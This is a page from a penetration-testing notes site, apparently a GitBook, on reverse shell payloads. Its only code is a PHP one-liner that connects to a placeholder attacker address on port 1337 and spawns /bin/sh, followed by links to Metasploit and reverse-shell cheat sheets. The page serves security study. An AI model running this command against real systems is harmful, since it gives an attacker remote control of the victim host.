Defender's Notes
  • Welcome!
  • Methodology
  • Ethical Hacking
  • Resources/Blogs/Conferences/Labs
  • Writing Vulnerability Reports
  • Linux Tips
  • Certifications
  • Bug Bounty
    • Hints
  • Python
  • PenTesting
    • Recon
    • Network Scanning
    • Reverse Shell Payloads
    • API Security Testing
    • 53 - DNS
    • 21 - ftp
    • 139,445 - SMB
    • 111,2049 - rcpbind
    • Authentication
    • Scripting
    • OSINT
    • Cloud Security
    • Reverse Engineering
    • Password
    • Proxy Chain
    • Steganography
    • Buffer Overflow
  • Windows
    • Recon
    • Golden/Silver Ticket
    • PowerShell for Beginners
    • Windows Priv Escalate
      • Icecast (RPC)
    • Kerberos Attack
  • Web Pentesting
    • 80,443,8080 - Recon
    • Resources
      • Burp Suite
    • Web Vulnerabilities
      • WordPress
      • CSP Bypass
      • JSON Web Tokens
      • Insecure Desensitization
      • Open Redirect
      • Command Injection
      • Path Traversals
      • SSRF
      • SQL Injection
      • IDOR
      • Shellshock
      • Heartbleed
      • Session Attacks/Bypass
      • XSS
      • XXE
      • CSRF
      • File Inclusion (Local/Remote)
      • Drupal
    • OWASP Top 10 2017
      • Top 1: Injection
      • Top 2: Broken Authentication
      • Top 3: Sensitive Data Exposure
      • Top 4: XML External Entities (XXE)
      • Top 5: Broken Access Control
      • Top 6: Security Misconfiguration
      • Top 7: Cross-Site Scripting (XSS)
      • Top 8: Insecure Deserialization
      • Top 9: Using Components with Known Vulnerabilities
      • Top 10: Insufficient Logging & Monitoring
    • OOB
    • Java
    • Python Web Security
  • Linux
    • Upgrading shell
    • Linux Priv Escalate
      • Path Variable Manipulation
      • Systemctl
  • Binary Security
    • AOT
  • Hardware Security
    • Wi-fi
    • Radio
  • Mobile Security
    • Android
    • SMS
  • Videos
    • IppSec Videos
    • The Cyber Mentor
Powered by GitBook
On this page
  • Cheat Sheet
  • Other Resources

Was this helpful?

  1. PenTesting

Reverse Shell Payloads

PreviousNetwork ScanningNextAPI Security Testing

Last updated 4 years ago

Was this helpful?

Cheat Sheet

Php reverse shell on console

php -r '$sock=fsockopen("<YOUR OP>",1337);exec("/bin/sh -i <&3 >&3 2>&3");'

Other Resources

NetSec's Creating Metasploit Payloads:

Cybsploit's Creating payloads via metasploit

Creating a Reverse shell to remotely execute commands

Pentestmonkey's Reverse Shell Cheat Shewet:

https://netsec.ws/?p=331
https://cybsploit.com/2019/08/12/how-to-generate-a-payload-for-metasploit-ZnlONTh0b0k0RXRoSlpFeDk5cUpqUT09
https://cybsploit.com/2019/08/28/how-to-create-a-reverse-shell-to-remotely-execute-commands-cXRxRXc1djFLNktKcU5CV0x5NVloUT09
http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet